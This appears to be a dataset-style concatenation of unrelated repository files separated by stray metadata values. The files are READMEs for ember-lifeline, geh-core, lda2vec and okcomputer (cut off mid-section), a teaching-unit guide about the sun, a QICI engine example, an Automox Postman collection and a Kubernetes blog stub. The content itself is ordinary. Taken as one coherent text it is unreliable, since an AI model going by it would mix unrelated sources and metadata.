# ember-lifeline [![Build Status](https://travis-ci.org/rwjblue/ember-lifeline.svg?branch=master)](https://travis-ci.org/rwjblue/ember-lifeline) [![Ember Observer Score](https://emberobserver.com/badges/ember-lifeline.svg)](https://emberobserver.com/addons/ember-lifeline) [![npm version](https://badge.fury.io/js/ember-lifeline.svg)](https://badge.fury.io/js/ember-lifeline) Ember applications have long life-cycles. A user may navigate to several pages and use many different features before they leave the application. This makes JavaScript and Ember development unlike Rails development, where the lifecycle of a request is short and the environment disposed of after each request. It makes Ember development much more like iOS or video game development than traditional server-side web development. It is good to note that this isn't something inherent to just Ember. Any single-page app framework or solution (Angular, React, Vue, Backbone...) must deal this lifecycles of objects, and specifically with how async tasks can be bounded by a lifecycle. There is a fantastic Ember addon, [ember-concurrency](http://ember-concurrency.com/) that solves these problems in a very exciting and simple way. It is largely inspired by [RxJS](http://reactivex.io/) and the Observable pattern, both of which concern themselves with creating life-cycle-free async that, in practice, tend to be hard for developers to learn. This addon introduces several utility methods to help manage async, object lifecycles, and the Ember runloop. These tools should provide a simple developer experience that allows engineers to focus on the business domain, and think less about the weird parts of working in a long-lived app. ## Installation ember install ember-lifeline To use any of the below mentioned methods in your component, route or service, you will have to import and apply one or both of these mixins to your class: * `ember-lifeline/mixins/run` for using any of the *Task methods * `ember-lifeline/mixins/dom` for using `addEventListener` * `ember-lifeline/mixins/disposable` for using `registerDisposable` and `runDisposable` ## Usage ### `runTask` **tl;dr Call `this.runTask(fn, timeout)` on any component, route, or service to schedule work.** Use `runTask` where you might use `setTimeout`, `setInterval`, or `Ember.run.later`. `runTask` will handle three common issues with the above APIs. First, *`setTimeout` and `setInterval` do not use the runloop*. Ember uses a [work queuing mechanism called the runloop ](https://guides.emberjs.com/v2.5.0/applications/run-loop/). In order for the queues to flush without autoruns (a feature that helps devs be lazy in development but is disabled in tests and harms performance), a runloop must be added around a callstack. For example: ```js import Ember from 'ember'; const { Component, run } = Ember; export default Component.extend({ init() { this._super(); window.setTimeout(() => { run(() => { this.set('date', new Date); }); }, 500); } }); ``` There are [several ways to add runloops in the Ember API docs](http://emberjs.com/api/classes/Ember.run.html), but regardless it is less than ideal to need to remember and reason about this. Often `Ember.run.later` is used instead of `setTimeout`, for this reason. However that still has issues. Second, *none of `setTimeout`, `setInterval` or `Ember.run.later` bind the timeout to the lifecycle of the context object*. If the example above is re-written to use `Ember.run.later`... ```js import Ember from 'ember'; const { Component, run } = Ember; export default Component.extend({ init() { this._super(); run.later(() => { this.set('date', new Date); }, 500); } }); ``` **We're still making a dangerous assumption that this component instance still exists 500ms from now**. In practice, especially with tests, objects scheduling timers may be destroyed by the time the timer fires. This causes a number of unexpected errors. To fix this, the codebase is littered with checks for `isDestroyed` state on objects retained after destruction: ```js import Ember from 'ember'; const { Component, run } = Ember; export default Component.extend({ init() { this._super(); run.later(() => { // First, check if this object is even valid if (this.isDestroyed) { return; } this.set('date', new Date); }, 500); } }); ``` The code above is correct, but again, less than simple to write. Instead, always use `runTask`. `runTask` entangles a timer with the lifecycle of the object scheduling the work. When the object is destroyed, the task is also cancelled. Using `runTask`, the above can be written as: ```js import Ember from 'ember'; import RunMixin from 'ember-lifeline/mixins/run'; const { Component } = Ember; export default Component.extend(RunMixin, { init() { this._super(); this.runTask(() => { this.set('date', new Date); }, 500); } }); ``` And no need to worry about cancellation or the `isDestroyed` status of the object itself. ### `scheduleTask` **tl;dr Call `this.scheduleTask(queueName, fnOrMethodName, args*)` on any component, route, or service to schedule work on the run loop.** Use `scheduleTask` where you might use `Ember.run.schedule`. Like `runTask`, `scheduleTask` avoids common pitfalls of deferred work. *`Ember.run.schedule` does not bind the scheduled work to the lifecycle of the context object*. ```js import Ember from 'ember'; const { Component, run } = Ember; export default Component.extend({ init() { this._super(); run.schedule('sync', this, () => { this.set('date', new Date); }); } }); ``` There's a chance that objects scheduling work may be destroyed by the time the queue is flushed. Leaving behavior to chance invites flakiness. This manifests as a number of unexpected errors. Fixing this issue requires checks for `isDestroyed` state on objects retained after destruction: ```js import Ember from 'ember'; const { Component, run } = Ember; export default Component.extend({ init() { this._super(); run.schedule('sync', this, () => { // First, check if this object is even valid if (this.isDestroyed) { return; } this.set('date', new Date); }); } }); ``` The code above is correct, but less than ideal. Instead, always use `scheduleTask`. `scheduleTask` entangles a scheduled task with the lifecycle of the object scheduling the work. When the object is destroyed, the task is also cancelled. Using `scheduleTask`, the above can be written as: ```js import Ember from 'ember'; import RunMixin from 'ember-lifeline/mixins/run'; const { Component } = Ember; export default Component.extend(RunMixin, { init() { this._super(); this.scheduleTask('sync', () => { this.set('date', new Date); }); } }); ``` #### A word about the `afterRender` queue Scheduling work on the `afterRender` queue has well known, negative performance implications. Therefore, *`scheduleTask` is prohibited from scheduling work on the `afterRender` queue.* ### `debounceTask` **tl;dr Call `this.debounceTask(methodName, args*, wait, immediate)` on any component, route, or service to debounce work.** Debouncing is a common async pattern often used to manage user input. When a task is debounced with a timeout of 100ms, it first schedules the work for 100ms later. Then if the same task is debounced again with (again) a timeout of 100ms, the first timer is cancelled and a new one made for 100ms after the second debounce request. If no request to debounce that task is made for 100ms, the task executes. Here is a good blog post about debounce and throttle patterns: [jQuery throttle / debounce: Sometimes, less is more!](http://benalman.com/projects/jquery-throttle-debounce-plugin/) Debouncing is a pattern for managing scheduled work over time, and so it falls prey to some of the same faults as `setTimeout`. Again Ember provides `Ember.run.debounce` to handle the runloop aspect, but does not provide a simple solution for cancelling work when the object is destroyed. Enter `debounceTask`. For example, no matter how quickly you click on this component, it will only report the time if you have stopped clicking for 500ms: ```js import Ember from 'ember'; import RunMixin from 'ember-lifeline/mixins/run'; const { Component } = Ember; export default Component.extend(RunMixin, { click() { this.debounceTask('reportTime', 500); }, reportTime() { this.set('time', new Date()); } }); ``` However if the component is destroyed, any pending debounce task will be cancelled. ### `throttleTask` **tl;dr Call `this.throttleTask(methodName, args*, spacing, immediate)` on any component, route, or service to throttle work.** When a task is throttled, it is executed immediately. For the length of the timeout, additional throttle calls are ignored. Again, like debounce, throttle falls prey to many issues shared by `setTimeout`, though fewer since the work itself is always run immediately. Regardless even just for consistency the API of `throttleTask` is presented: ```js import Ember from 'ember'; import RunMixin from 'ember-lifeline/mixins/run'; const { Component } = Ember; export default Component.extend(RunMixin, { click() { this.throttleTask('reportTime', 500); }, reportTime() { this.set('time', new Date()); } }); ``` In this example, the first click will update `time`, but clicks after that for 500ms will be disregarded. Then, the next click will fire and start a timeout window of its own. Often it is desired to pass additional arguments to the throttle callback. We also need to reference the same function in order for throttling to work. In order to acheive this it is recommended to make use of instance variables. This enables the throttle function to use the arguments in the state they are in at the time the callback is executed: ```js import Ember from 'ember'; import RunMixin from 'ember-lifeline/mixins/run'; const { Component } = Ember; export default Component.extend(RunMixin, { click(evt) { this._evt = evt; this.throttleTask('updateClickedEl', 500); }, updateClickedEl() { this.set('lastClickedEl', this._evt.target); this._evt = null; } }); ``` ### `pollTask` **tl;dr call `this.pollTask(fn, label)` on any component, route, or service to setup polling.** Use `pollTask` where you might reach for recursive `this.runTask(fn, ms)`, `Ember.run.later`, `setTimeout`, and/or `setInterval`. When using recursive `runTask` or `run.later` invocations causes tests to pause forever. This is due to the fact that the Ember testing helpers automatically wait for all scheduled tasks in the run loop to finish before resuming execution in the normal test context. And as a reminder, *`setInterval` should never be used*. Say you `setInterval(fn, 20);`. Regardless of how long `fn` takes, a new call will be scheduled every 20ms. For example if `fn` took 80ms to run (not uncommon), then *four* new `fn` calls would be in the browser's event queue waiting to fire immediately. This causes memory issues (the queue may never flush) and performance problems. Instead, you should be scheduling new work *after* the previous work was done. For example: ```js import Component from 'ember-component'; import RunMixin from 'ember-lifeline/mixins/run'; export default Component.extend(RunMixin, { init() { this._super(...arguments); this.updateTime(); }, updateTime() { this.set('date', new Date()); this.runTask(() => this.updateTime(), 20); } }); ``` In this way the true delay between setting `date` is `20ms + time the rendering took`. However, more work is still needed since when used in an acceptance test, the snippet above will cause the test to never complete. To avoid this testing "freezing" behavior, we would need to update the component to have different behavior when testing than when running in normal development / production. Typically, this is done something like: ```js import Ember from 'ember'; import Component from 'ember-component'; import RunMixin from 'ember-lifeline/mixins/run'; export default Component.extend(RunMixin, { init() { this._super(...arguments); this.updateTime(); }, updateTime() { this.set('date', new Date()); if (!Ember.testing) { this.runTask(() => this.updateTime(), 20); } } }); ``` Unfortunately, this makes it very difficult to actually test that the polling is happening, and often times the polling behavior is itself either fundamental to the objects purpose or difficult enough to warrant its own tests. This is where `pollTask` really shines. You could rewrite the above example to use `pollTask` like this: ```js import Component from 'ember-component'; import injectService from 'ember-service/inject'; import RunMixin from 'ember-lifeline/mixins/run'; export default Component.extend(RunMixin, { time: injectService(), init() { this._super(...arguments); this.pollTask('updateTime', 'updating-time#updateTime'); }, updateTime(next) { let time = this.get('time'); this.set('date', time.now()); this.runTask(next, 20); } }); ``` In development and production, the `updateTime` method is executed initially during the components `init` and then recursively called every 20ms after its processing finishes. When the component is destroyed (e.g. no longer rendered on screen) any pending timers from `runTask` or `debounceTask` calls are properly canceled (as usual with those methods). In testing, the `updateTime` method would execute initially during the components instantiation (just like in development and production environments), but would not automatically start polling. This allows tests that are not related to the polling behavior to continue uninterrupted. To test the actual polling functionality, use the provided `pollTaskFor` helper: ```js import moduleForComponent from 'ember-lifeline/tests/helpers/module-for-component'; import wait from 'ember-test-helpers/wait'; import { pollTaskFor } from 'ember-lifeline/mixins/run'; import Service from 'ember-service'; let fakeNow; moduleForComponent('updating-time', { integration: true, beforeEach() { this.register('service:time', Service.extend({ now() { return fakeNow; } })); } }); test('updating-time updates', function(assert) { fakeNow = new Date(2016); this.render(hbs` {{#updating-time as |time|}} {{time}} {{/updating-time}} `); assert.equal(this.$().text().trim(), fakeNow); return wait() .then(() => { fakeNow = new Date(2017); pollTaskFor('updating-time#updateTime'); return wait(); }) .then(() => { assert.equal(this.$().text().trim(), fakeNow); }); }); ``` A couple of helpful assertions are provided with the `pollTask` functionality: * A given `label` can only be used once. If the same `label` is used a second time, an error will be thrown. * If nothing has been queued for the given label, calling `pollTaskFor(label)` will trigger an error. ### `registerDisposable` **tl;dr call `this.registerDisposable(fn)` on any component, route, or service to register a function you want to run when the object is destroyed.** Use `registerDisposable` as a replacement for explictly disposing of any externally managed resources. A disposable is a function that disposes of resources that are outside of Ember's lifecyle. This essentially means you can register a function that you want to run to automatically tear down any resources when the Ember object is destroyed. Example: It's common to see code written to explicitly unbind event handlers from external libraries. ```js // app/components/foo-bar.js import Ember from 'ember'; import DisposableMixin from 'ember-lifeline/mixins/disposable'; import DOMish from 'some-external-library'; const { run } = Ember; export default Component.extend(DisposableMixin, { init() { this._super(...arguments); this.DOMish = new DOMish(); this.bindEvents(); }, willDestroy() { this.unbindEvents(); }, bindEvents() { this.DOMish.on('foo', run.bind(this.respondToDomEvent)); }, unbindEvents() { this.DOMish.off('foo'); } respondToDOMEvent() { // do something } }); ``` This not only adds verbosity to code, but also requires that you symetrically tear down any bindings you setup. By utilizing the `registerDisposable` API, `ember-lifeline` will ensure your registered disposable function will run when the object is destroyed. ```js // app/components/foo-bar.js import Ember from 'ember'; import DisposableMixin from 'ember-lifeline/mixins/disposable'; import DOMish from 'some-external-library'; const { run } = Ember; export default Component.extend(DisposableMixin, { init() { this._super(...arguments); this.DOMish = new DOMish(); this.bindEvents(); }, bindEvents() { let onFoo = run.bind(this.respondToDomEvent); this.DOMish.on('foo', onFoo); this.domFooToken = this.registerDisposable(() => this.DOMish.off('foo', onFoo)); }, respondToDOMEvent() { // do something } }); ``` The `registerDisposable` method returns a `disposable`, which is an object with the following interface: ```ts interface IDisposable { dispose: function; disposed: boolean; } ``` You can explicity run the disposable without waiting for the object's destruction.** ```js // app/components/foo-bar.js import DOMish from 'some-external-library'; import DisposableMixin from 'ember-lifeline/mixins/disposable'; import Ember from 'ember'; const { run } = Ember; export default Component.extend(DisposableMixin, { init() { this.DOMish = new DOMish(); this.bindEvents(); }, bindEvents() { let onFoo = run.bind(this.respondToDomEvent); this.DOMish.on('foo', onFoo); this.domFooDisposable = this.registerDisposable(() => this.DOMish.off('foo', onFoo)); }, respondToDOMEvent() { // do something }, actions: { cancelDOM() { this.domFooDisposable.dispose(); } } }); ``` ### `addEventListener` **tl;dr call `this.addEventListener(element, eventName, fn, options)` on a component or route to add a jQuery event listener that will be automatically removed when the component is un-rendered.** Event listeners pose similar but different challenges. They likewise must have a runloop added around their callback, and are pinned to an object's lifecycle- in this case to the detachment of that component from the DOM (`willDestroyElement`). For example this is an idiomatic and correct way to add an event listener to the window in Ember: ```js import Ember from 'ember'; const { Component, run } = Ember; export default Component.extend({ didInsertElement() { this._super(); $(window).on(`scroll.${this.elementId}`, (e) => { run(() => { this.set('windowScrollOffset', e.clientY); }); }); }, willDestroyElement() { $(window).off(`scroll.${this.elementId}`); this._super(); } }); ``` This verbosity, and the need to do so many things right by hand, is very unfortunate. With `addEventListener` the above example can be re-written as: ```js import Ember from 'ember'; import DomMixin from 'ember-lifeline/mixins/dom'; const { Component } = Ember; export default Component.extend(DomMixin, { didInsertElement() { this._super(); this.addEventListener(window, 'scroll', (e) => { this.set('windowScrollOffset', e.clientY); }); } }); ``` `addEventListener` will provide the runloop and automatically remove the listener when `willDestroyElement` is called. `addEventListener` provides several ways to specify an element: ```js // Attach to an element inside this component this.addEventListener('.someClass', 'scroll', fn); // Attach to a jQuery list this.addEventListener(this.$('.someClass'), 'scroll', fn); // Any jQuery list, even those outside the component this.addEventListener($('.someClass'), 'scroll', fn); // Attach to a DOM node this.addEventListener(document.body, 'click', fn); // Attach to window this.addEventListener(window, 'scroll', fn); ``` ### `removeEventListener` **tl;dr call `this.removeEventListener(element, eventName, fn, options)` on a component or route to actively remove a jQuery event listener previously added by a call to `addEventListener`.** Although any listener added by a call to `addEventListener` will be teared down when the route or component is being destroyed, there might be cases where you want to actively remove an existing event listener even during the active lifecycle, for example when temporarily dealing with high volume events like `scroll` or `mousemove`. Be sure to pass the identical arguments used when calling `addEventListener`! ## Credit This addon was developed internally at Twitch, written originally by [@mixonic](https://github.com/mixonic) and [@rwjblue](https://github.com/rwjblue). The name `ember-lifeline` was suggested by [@nathanhammod](https://github.com/nathanhammond).
30.790393
343
0.722073
eng_Latn
0.988062
6f69b49179be9c5d0519c0f14989fbf5c370b8ac
1,547
md
Markdown
content/curriculum/guides/2005/4/05.04.06.x.md
kenlu89/teachers_institute
1fc993f30d6ac17b3097e63510ce758a12c910ea
[ "MIT" ]
null
null
null
content/curriculum/guides/2005/4/05.04.06.x.md
kenlu89/teachers_institute
1fc993f30d6ac17b3097e63510ce758a12c910ea
[ "MIT" ]
null
null
null
content/curriculum/guides/2005/4/05.04.06.x.md
kenlu89/teachers_institute
1fc993f30d6ac17b3097e63510ce758a12c910ea
[ "MIT" ]
null
null
null
--- layout: "unit" title: "Guide Entry 05.04.06" path: "/curriculum/guides/2005/4/05.04.06.x.html" unitTitle: "The Sun in Our Lives" unitAuthor: "Roberta A. Mazzucco" keywords: "" recommendedFor: "Recommended for Science, grades 2-5." --- <body> <hr/> <h4> Guide Entry to 05.04.06: </h4> <p> This unit was written to be used in a third grade classroom, but can easily be adapted for use in a second, fourth, or fifth grade. The unit deals with the sun and how it affects life on earth. The unit does not include any serious discussion of the individual nine planets. Its focus is the sun and the development of our solar system and the universe. It is organized around a set of questions, from: where did the sun and planets come from? , and what is the anatomy of the sun? , to: how does the sun affect our weather?, and how do we have night and day and the seasons? </p> <p> The unit offers a set of hands-on experiments and demonstrations. There is also an experiment on the absorption of light, and how it is affected by color, and a demonstration of the colors contained in sunlight. There is also a demonstration of how the universe is expanding, and the effect it has on the galaxies using a balloon and beads, as well as raisin cake. The unit also provides an annotated bibliography of teacher and children's books, as well as a list of some of the many astronomy sites available on the Web. There is also an appendix listing the specific science standards covered by the unit. </p> <p> (Recommended for Science, grades 2-5.) </p> </body>
64.458333
609
0.757595
eng_Latn
0.999861
6f69d750729b1c043d1338ee5ddec45999de759c
933
md
Markdown
projects/Node/call-all/docs/README.md
oneseedfruit/qiciengine-examples
725faff2217e806b1b2e91699bee902714f26e2e
[ "MIT" ]
1
2019-04-29T15:08:42.000Z
2019-04-29T15:08:42.000Z
projects/Node/call-all/docs/README.md
oneseedfruit/qiciengine-examples
725faff2217e806b1b2e91699bee902714f26e2e
[ "MIT" ]
null
null
null
projects/Node/call-all/docs/README.md
oneseedfruit/qiciengine-examples
725faff2217e806b1b2e91699bee902714f26e2e
[ "MIT" ]
null
null
null
# call-all * 本范例运行时,点击某个Sprite节点时,该节点不可见,通过点击Revive all按钮,则所有的Sprite节点可见,效果图如下:<br> ![](images/show.gif) ## UI * 创建6个Sprite节点,分别取名item1~item6,创建一个图片节点Image取名revive,revive节点属性值设置如下:<br> ![](images/revive.png) * 创建一个Text文本节点取名clue,clue节点属性值设置如下:<br> ![](images/text.png) * 在Scripts文件夹下创建脚本,并将该脚本挂载到revive节点上,将item1~item6节点分别拖入到对应属性,如下图所示:<br> ![](images/script.png) * 脚本代码如下:<br> ```javascript var UI = qc.defineBehaviour('qc.engine.UI', qc.Behaviour, function() { }, { //序列化 items: qc.Serializer.NODES }); //初始化 UI.prototype.awake = function() { var self = this; self.items.forEach(function(item) { //添加按钮监听 self.addListener(item.onClick, self.onItemClick, self); }); }; UI.prototype.onItemClick = function(item) { // 隐藏item item.visible = false; }; //点击事件响应 UI.prototype.onClick = function() { this.items.forEach(function(item) { item.visible = true; }); }; ```
19.040816
73
0.672026
yue_Hant
0.644755
6f6a4881680c8d5f8a60f671cd865c8d1384420e
5,395
md
Markdown
_listings/automox/policies-get-postman.md
streamdata-gallery-organizations/automox
45376eefebda23d7d37ca579fcca89287f87a1d2
[ "CC-BY-3.0" ]
null
null
null
_listings/automox/policies-get-postman.md
streamdata-gallery-organizations/automox
45376eefebda23d7d37ca579fcca89287f87a1d2
[ "CC-BY-3.0" ]
null
null
null
_listings/automox/policies-get-postman.md
streamdata-gallery-organizations/automox
45376eefebda23d7d37ca579fcca89287f87a1d2
[ "CC-BY-3.0" ]
null
null
null
{ "info": { "name": "Automox Get Policies", "_postman_id": "fb2ef5a0-ff50-4d9a-a4d7-26fb81c8d423", "description": "Gets all `Policy` objects for authenticated user", "schema": "https://schema.getpostman.com/json/collection/v2.0.0/" }, "item": [ { "name": "Events", "item": [ { "id": "a3420d12-e727-4340-b8e3-bba536194d54", "name": "gets-all-event-objects-for-the-authenticated-user", "request": { "url": "http://console.automox.com/api/events", "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Gets all `Event` objects for the authenticated user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "514405f0-5625-4bd8-9861-37631e9f40d5" } ] }, { "id": "0f788f5f-6df5-4cba-b549-82f6510c87ab", "name": "gets-a-specific-event-object-for-the-authenticated-user", "request": { "url": { "protocol": "http", "host": "console.automox.com", "path": [ "api", "events/:id" ], "variable": [ { "id": "id", "value": "{}", "type": "string" } ] }, "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Gets a specific `Event` object for the authenticated user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "ea42ced1-96f3-487b-a6d7-dfb82d2772d0" } ] } ] }, { "name": "Orgs", "item": [ { "id": "cf6069a1-3123-4aa4-939a-a1af2c2a04ec", "name": "gets-all-organizations-for-the-api-key", "request": { "url": "http://console.automox.com/api/orgs", "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Gets all organizations for the api key" }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "d8820d08-f7ed-40b7-b6b3-105863d0b90a" } ] }, { "id": "7b1e132b-9c75-44a4-a835-655baded8590", "name": "returns-all-software-packages-discovered-on-all-servers-endpoints-of-an-organization", "request": { "url": { "protocol": "http", "host": "console.automox.com", "path": [ "api", "orgs/:id/packages" ], "variable": [ { "id": "id", "value": "{}", "type": "string" } ] }, "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Returns all software packages discovered on all servers (endpoints) of an organization" }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "66172c47-0772-4466-9535-1e4297597224" } ] } ] }, { "name": "Policies", "item": [ { "id": "4615dc18-9d9a-48d3-9438-e5122741315a", "name": "gets-all-policy-objects-for-authenticated-user", "request": { "url": "http://console.automox.com/api/policies?o=%7B%7D", "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Gets all `Policy` objects for authenticated user" }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "a9fc13ea-6793-41c6-aa8a-79b91ac4ce5b" } ] } ] } ] }
28.696809
116
0.344393
yue_Hant
0.156628
6f6a76e8f49cee7844a5f277409f8a54f8b57086
1,567
md
Markdown
README.md
Energinet-DataHub/geh-core
16a7a336ba4b8336812f87f15c35bfe9abd693f1
[ "Apache-2.0" ]
null
null
null
README.md
Energinet-DataHub/geh-core
16a7a336ba4b8336812f87f15c35bfe9abd693f1
[ "Apache-2.0" ]
8
2021-09-28T07:56:38.000Z
2022-03-30T12:31:10.000Z
README.md
Energinet-DataHub/geh-core
16a7a336ba4b8336812f87f15c35bfe9abd693f1
[ "Apache-2.0" ]
null
null
null
[![codecov](https://codecov.io/gh/Energinet-DataHub/geh-core/branch/main/graph/badge.svg?token=CXGH54CZ85)](https://codecov.io/gh/Energinet-DataHub/geh-core) # Introduction This repository is dedicated to code that will be shared between two or more domains. The shared code will be published as reusable components in the form of NuGet packages on [nuget.org](https://www.nuget.org/). ## Links - [development.md](./documents/development.md) ## Folder Structure Artifacts should be organized in the following folder structure: ``` txt <root> │ .editorconfig │ .gitignore │ .licenserc.json | codecov.yml │ LICENSE │ README.md │ ├───.github │ └───actions │ └───workflows │ ├───documents │ development.md │ └───source ``` ### `root` Contains: - `.editorconfig` file for configuration of Formatting, Code Style and Analyzers (including StyleCop). - `.gitignore` file that defines which files should be ignored (not checked in) by Git. - `.licenserc.json` *TODO: Add a description.* - `codecov.yml`file contains the CodeCov configuration outlining the flags/projects where code coverage is tracked. - `LICENSE` *TODO: Add a description.* - `README.md` file that gives an introduction to this repository. ### `.github` Contains GitHub workflow and action (`*.yml`) files for establishing build pipelines. ### `documents` Contains notes and documentation stored in `*.md` files. ### `source` Contains libraries in subfolders. For details on library organization and development see [development.md](./documents/development.md).
27.017241
212
0.726867
eng_Latn
0.962266
6f6a8122d6359e9f80dbec0324a8d40c8b8198a4
663
md
Markdown
_posts/k8s-openstack.md
GabrielSVinha/gabrielsvinha.github.io
461f57c8ada4904da75d5135efd11c524faf87cf
[ "MIT" ]
null
null
null
_posts/k8s-openstack.md
GabrielSVinha/gabrielsvinha.github.io
461f57c8ada4904da75d5135efd11c524faf87cf
[ "MIT" ]
null
null
null
_posts/k8s-openstack.md
GabrielSVinha/gabrielsvinha.github.io
461f57c8ada4904da75d5135efd11c524faf87cf
[ "MIT" ]
null
null
null
--- title: 'Kubernetes with OpenStack Cloud Provider' date: 2018-03-27 permalink: /posts/2018/03/k8s-openstack/ tags: - kubernetes - openstack - cloud --- Kubernetes has been a buzz word in tech for a long time, this is a sympton of both something with high recommendation rates and low failure rates. Other important characteristics of Kubernetes such as high availability, scalability, etc. can be easily proven with a few days using the tool. In this article we want to focus on one of K8S greatest abilities: integration. --- Check out the full article in this [link](https://medium.com/@vinhags/kubernetes-with-openstack-cloud-provider-4768c06d7e53)
44.2
370
0.775264
eng_Latn
0.986831
6f6ada2542fa6ecc2404028e1340b3553249ec88
914
md
Markdown
lda2vec/README.md
Rochan-A/TopicModeling
d13221960ca6f63590bfcfed54df8680879f6b11
[ "MIT" ]
2
2019-01-08T14:12:41.000Z
2020-03-21T00:50:05.000Z
lda2vec/README.md
Rochan-A/TopicModeling
d13221960ca6f63590bfcfed54df8680879f6b11
[ "MIT" ]
null
null
null
lda2vec/README.md
Rochan-A/TopicModeling
d13221960ca6f63590bfcfed54df8680879f6b11
[ "MIT" ]
null
null
null
# Topic Modeling with lda2vec ### Note: Use [this](https://github.com/Rochan-A/lda2vec) forked version of lda2vec. Original version can be found [here](https://github.com/cemoody/lda2vec) ## Files * `preprocess.py` Use the tokenized output from `parse.py` that can be found [here](https://github.com/Rochan-A/TopicModeling/blob/master/lda%26w2vec/parse.py). * Use either `filtered.txt` or `tokens.txt` as the input * `lda2vec_run.py` Executes model. Requires CUDA * `lda2vec_model.py` lda2vec (class) model ## Usage Generate the `corpus`, `data.npz`, `tokens` and `vocab` files. `$ python preprocess.py -h` ``` usage: preprocess.py [-h] [-i INPUT_PATH] [-o OUTPUT_PATH] optional arguments: -h, --help show this help message and exit -i INPUT_PATH, --input-path INPUT_PATH Path to tokenized sentences -o OUTPUT_PATH, --output-path OUTPUT_PATH Destination for parsed and preprocessed output ```
36.56
161
0.727571
eng_Latn
0.59324
6f6be22f4a7c665be43b6899cb6120fd9aea3c28
6,932
markdown
Markdown
README.markdown
ekampp/okcomputer
8e41af50282ccfe16754574a1d67c87d80be371f
[ "MIT" ]
null
null
null
README.markdown
ekampp/okcomputer
8e41af50282ccfe16754574a1d67c87d80be371f
[ "MIT" ]
null
null
null
README.markdown
ekampp/okcomputer
8e41af50282ccfe16754574a1d67c87d80be371f
[ "MIT" ]
null
null
null
[![Code Climate](https://codeclimate.com/github/sportngin/okcomputer.svg)](https://codeclimate.com/github/sportngin/okcomputer) [![Build Status](https://travis-ci.org/sportngin/okcomputer.svg)](https://travis-ci.org/sportngin/okcomputer) [![Coverage Status](https://coveralls.io/repos/sportngin/okcomputer/badge.svg?branch=master)](https://coveralls.io/r/sportngin/okcomputer) # OK Computer Inspired by the ease of installing and setting up [fitter-happier] as a Rails application's health check, but frustrated by its lack of flexibility, OK Computer was born. It provides a robust endpoint to perform server health checks with a set of built-in plugins, as well as a simple interface to add your own custom checks. For more insight into why we built this, check out [our blog post introducing OK Computer][blog]. [blog]:http://pulse.sportngin.com/news_article/show/267646?referrer_id=543230 OkComputer currently supports the following Rails versions: * 6.0 * 5.2 * 5.1 * 4.2 #### Not using Rails? If you use [Grape] instead of Rails, check out [okcomputer-grape]. [Grape]:https://github.com/ruby-grape/grape [okcomputer-grape]:https://github.com/bellycard/okcomputer-grape ## Installation Add this line to your application's Gemfile: gem 'okcomputer' And then execute: $ bundle Or install it yourself as: $ gem install okcomputer ## Usage To perform the default checks (application running and ActiveRecord database connection), do nothing other than adding to your application's Gemfile. ### If Not Using ActiveRecord We also include a MongoidCheck, but do not register it. If you use Mongoid, replace the default ActiveRecord check like so: ```ruby OkComputer::Registry.register "database", OkComputer::MongoidCheck.new ``` If you use another database adapter, see Registering Custom Checks below to build your own database check and register it with the name "database" to replace the built-in check, or use `OkComputer::Registry.deregister "database"` to stop checking your database altogether. ### Requiring Authentication Optionally require HTTP Basic authentication to view the results of checks in an initializer, like so: ```ruby # config/initializers/okcomputer.rb OkComputer.require_authentication("username", "password") ``` To allow access to specific checks without a password, optionally specify the names of the checks: ```ruby # config/initializers/okcomputer.rb OkComputer.require_authentication("username", "password", except: %w(default nonsecret)) ``` ### Changing the OkComputer Route By default, OkComputer routes are mounted at `/okcomputer`. If you'd like to use an alternate route, you can configure it with: ```ruby # config/initializers/okcomputer.rb OkComputer.mount_at = 'health_checks' # mounts at /health_checks ``` For more control of adding OkComputer to your routes, set `OkComputer.mount_at = false` to disable automatic mounting, and you can manually mount the engine in your `routes.rb`. ```ruby # config/initializers/okcomputer.rb OkComputer.mount_at = false # config/routes.rb, at any priority that suits you mount OkComputer::Engine, at: "/custom_path" ``` ### Logging check results Log check results by setting `OkComputer.logger`. Note: results will be logged at the `info` level. ```ruby OkComputer.logger = Rails.logger ``` ```sh [okcomputer] mycheck: PASSED mymessage (0s) ``` ### Registering Additional Checks Register additional checks in an initializer, like so: ```ruby # config/initializers/okcomputer.rb OkComputer::Registry.register "resque_down", OkComputer::ResqueDownCheck.new OkComputer::Registry.register "resque_backed_up", OkComputer::ResqueBackedUpCheck.new("critical", 100) # This check works on 2.4.0 and above versions of resque-scheduler OkComputer::Registry.register "resque_scheduler_down", OkComputer::ResqueSchedulerCheck.new ``` ### Registering Custom Checks The simplest way to register a check unique to your application is to subclass OkComputer::Check and implement your own `#check` method, which sets the display message with `mark_message`, and calls `mark_failure` if anything is wrong. ```ruby # config/initializers/okcomputer.rb class MyCustomCheck < OkComputer::Check def check if rand(10).even? mark_message "Even is great!" else mark_failure mark_message "We don't like odd numbers" end end end OkComputer::Registry.register "check_for_odds", MyCustomCheck.new ``` ### Registering Optional Checks Register an optional check like so: ```ruby # ... OkComputer::Registry.register "some_optional_check", OkComputer::ResqueBackedUpCheck.new("critical", 100) # ... OkComputer.make_optional %w(some_optional_check another_optional_check) ``` This check will run and report its status, but will not affect the HTTP status code returned. ### Customizing plain-text output The plain-text output flows through Rails' internationalization framework. Adjust the output as necessary by defining `okcomputer.check.passed` and `okcomputer.check.failed` keys in your setup. The default values are available [in `okcomputer.en.yml`][i18n]. [i18n]:https://github.com/sportngin/okcomputer/blob/eb0be05cc1527e083edd63cfbb0a071f7892c822/config/locales/okcomputer.en.yml#L1-L5 ## Running checks in parallel By default, OkComputer runs checks in sequence. If you'd like to run them in parallel, you can configure it with: ```ruby # config/initializers/okcomputer.rb OkComputer.check_in_parallel = true ``` ## Performing Checks * Perform a simple up check: http://example.com/okcomputer * Perform all installed checks: http://example.com/okcomputer/all * Perform a specific installed check: http://example.com/okcomputer/database Checks are available as plain text (by default) or JSON by appending .json, e.g.: * http://example.com/okcomputer.json * http://example.com/okcomputer/all.json ## 